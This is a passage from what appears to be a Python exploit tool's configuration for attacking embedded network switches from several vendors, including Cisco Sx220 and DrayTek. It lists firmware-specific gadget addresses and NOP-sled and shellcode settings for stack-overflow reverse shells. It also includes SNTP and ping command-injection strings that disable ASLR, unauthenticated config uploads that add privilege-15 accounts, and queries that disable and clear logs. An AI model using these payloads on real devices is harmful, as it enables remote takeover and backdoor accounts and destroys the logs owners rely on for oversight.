# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_fileClear':0x413A14,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntp_set':0x4108E4,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntpDel_set':0x4108E4,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSettings_set':0x4108E4,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# Draytek
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'752-95168': {
'template':'DrayTek',# Static for the vendor
'version':'2.1.4',# Version / binary dependent stuff
'model':'VigorSwitch P1100',  #
'uri':'https://www.draytek.com/products/vigorswitch-p1100/',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40C67C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99852c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x248490ac,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
'log_settings_set':0x413E34,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_ramClear':0x413D64,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_fileClear':0x413D64,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntp_set':0x410CA8,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntpDel_set':0x410CA8,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSettings_set':0x410CA8,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,# 
}, 
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# Cerio
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'224-5061': {
'template':'Cerio',# Static for the vendor
'version':'1.00.29',# Version / binary dependent stuff
'model':'CS-2424G-24P',  #
'uri':'https://www.cerio.com.tw/eng/switch/poe-switch/cs-2424g-24p/',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E6DC,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998524,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x248411bc,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()
'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
'sys_ping_post_check':'',
'web_sys_ping_post':0x40E114,# Jump one after 'sw $ra'# (address, binary dependent)

'verify_uri':'/tmp/check',
'vulnerable': True,# 
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
'log_settings_set':0x41DB4C,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_ramClear':0x41DA94,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
'log_fileClear':0x41DA94,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntp_set':0x415F14,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntpDel_set':0x415F14,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSettings_set':0x415F14,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': False,# 
}, 
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# Abaniact
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : No
# Del /mntlog/flash.log  : No
# Add credentials        : Yes
# Del credentials        : Yes
#
'222-45866': {
'template':'Abaniact',# Static for the vendor
'version':'116B00033',# Version / binary dependent stuff
'model':'AML2-PS16-17GP L2',# Model
'uri':'https://www.abaniact.com/L2SW/',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E65C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998524,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x2484152c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# Ping IPv4
#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
#'verify_uri':'/tmp/pingtest_tmp',
#'web_sys_ping_post':0x4296FC,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()

# traceroute
'web_sys_ping_post':0x429F58,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
'verify_uri':'/tmp/traceroute_tmp',
'vulnerable': True,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
'log_settings_set':0x4B4FE4,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_ramClear':0x4BA5D0,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_fileClear':0x4BA5D0,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'stack_cgi_sntp': {
'sys_timeSntp_set':0x43764C,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x43764C,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x431CC4,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': False,
}, 
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'query':'username=admin&password=_PWDNOP_RA_START&login=1&shellcod=_USRNOP_USRNOP_USRNOP_SHELLCODE',
'START':0x7ffe6e04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'usr_nop': 53,# NOP sled (shellcode will be tailed)
'pwd_nop': 45,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'vulnerable': True,
'workaround':True,# My LAB workaround

},
},
},

#
# TG-NET Botone Technology Co.,Ltd.
# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology)
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : No
# Del /mntlog/flash.log  : No
# Add credentials        : Yes
# Del credentials        : Yes
#
'222-81176': {
'template':'TG-NET',# Static for the vendor
'version':'3.1.1-R1',# Version / binary dependent stuff
'model':'P3026M-24POE (V3)',# Model
'uri':'http://www.tg-net.net/productshow.asp?ProdNum=1049&parentid=98',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40C74C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x2484a2d4,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
'log_settings_set':0x46AC10,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_ramClear':0x46E368,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_fileClear':0x46E368,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)

'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntp_set':0x42243C,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x42243C,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x424DE0,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)

'vulnerable':False,
}, 

# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),
# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:
# 
# NOP's
# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00
# '%24%04%FF%FF' : li $a0, 0xFFFFFFFF
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',
'START':0x10010104,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP' :0x10600604,# end: You may want to play with this if you dont get it working
'usr_nop': 28,# NOP sled (shellcode will be tailed)
'pwd_nop': 20,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

}

#
# Vendor templates, Vendor_ETag() will be merged to here
# (dont delete anything here thats not moved to Vendor_ETag())
#

Vendor_Template = {
#
'Planet': {
'vendor': 'PLANET Technology Corp.',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=5121',
'status':'',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_5132=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
# Verify lacking authentication
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!', # one 0x20 in beginning
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!', # one 0x20 in beginning
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!', # one 0x20 in beginning
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
'vulnerable': True,
'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'md5',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
#'encryption':'nopassword',
#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'', 
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=526&usrName=USERNAME',
'vulnerable': True,
'safe': True
}, 
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
#
# The stack overflow in 'username' and 'password' at same request are multipurpose.
#

#
# The trick to jump and execute:
# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
# 4. We will also feed required function parameters, by adding them to '_CMD_'
#
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,

'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&_CMD_&login=1',
'sys_ping_post_check':'',
'sys_ping_post_SIGSEGV': False,# SIGSEGV ?

'workaround':True,# My LAB workaround

'vulnerable': True,
'safe': True

},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',

'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
'log_settings_set_SIGSEGV':False,# Disable Logging SIGSEGV ?

'log_ramClear_cmd':'',# Clean RAM log CMD
'log_ramClear_SIGSEGV':False,# Clean RAM log SIGSEGV ?

'log_fileClear_cmd':'',# Clean FILE log CMD
'log_fileClear_SIGSEGV':False,# Clean FILE log SIGSEGV ?

'workaround':True,# My LAB workaround
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',

'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',

'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',

'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,# SIGSEGV ?

'workaround':True,# My LAB workaround
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
}, 

#
# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
#
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
'workaround':True,# My LAB workaround
'stack':True, # False = use Heap, and there are no ASLR
'vulnerable': True,
'safe': True
},

},
},

'Cisco': { 
'vendor': 'Cisco Systems, Inc.',
'model':'Sx220',
'uri':'https://www.cisco.com/c/en/us/support/switches/small-business-220-series-smart-plus-switches/tsd-products-support-series-home.html',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':True,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':True,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_settings',
'disable_query':'{"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_settings',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',
'clean_logfile_query':'{"":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',
'clean_logmem_query':'{"":{}}',
'vulnerable': True,
'safe': True
},
# Verify lacking authentication
'verify': { 
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadbakcfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/backup-config',
'content_check':'/mnt/backup-config',
'vulnerable': True,
'safe': True
},
'httpuploadlang.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "language" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadlang.cgi',
'check_uri':False,# 
'content': self.random_string(30), # We checking returned 'errMsgLangMG' and LEN of this text
'content_check':'errMsgLangMG',#
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadruncfg.cgi',
'check_uri':'/tmp/http_saverun_cfg',
'content':'/var/config/running-config',
'content_check':'/var/config/running-config',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httprestorecfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/startup-config',
'content_check':'/mnt/startup-config',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'/tmp/http_uploadfail',
'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
'content_check':'Copy: Illegal software format',
'vulnerable': True,
'safe': True
},
'login.cgi': {
'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
'authenticated': False,
'response':'file',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
'content':'{"_ds=1&username='+ self.random_string(32) +'&password=/tmp/VUL.TXT&_de=1":{}}',
'content_check':'2',
'vulnerable': True,
'safe': True
},
'set.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
'vulnerable': True,
'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'md5',
'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
#'encryption':'nopassword',
#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',
'vulnerable': True,
'safe': True
}, 
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
#
# The stack overflow in 'username' and 'password' at same request are multipurpose.
#

#
# The trick to jump and execute:
# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
# 4. We will also feed required function parameters, by adding them to '_CMD_'
#
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,

'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_ping_post_SIGSEGV': True,# SIGSEGV ?

'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True

},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',

'log_settings_set_cmd':'',# Disable Logging CMD
'log_settings_set_SIGSEGV':True,# Disable Logging SIGSEGV ?

'log_ramClear_cmd':'',# Clean RAM CMD
'log_ramClear_SIGSEGV':True,# Clean RAM SIGSEGV ?

'log_fileClear_cmd':'',# Clean FILE log CMD
'log_fileClear_SIGSEGV':True,# Clean FILE log SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',

'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=123',# CMD

'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',# Enable CMD
'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',# Disable CMD
'sys_timeSettings_set_SIGSEGV': True,# SIGSEGV ?

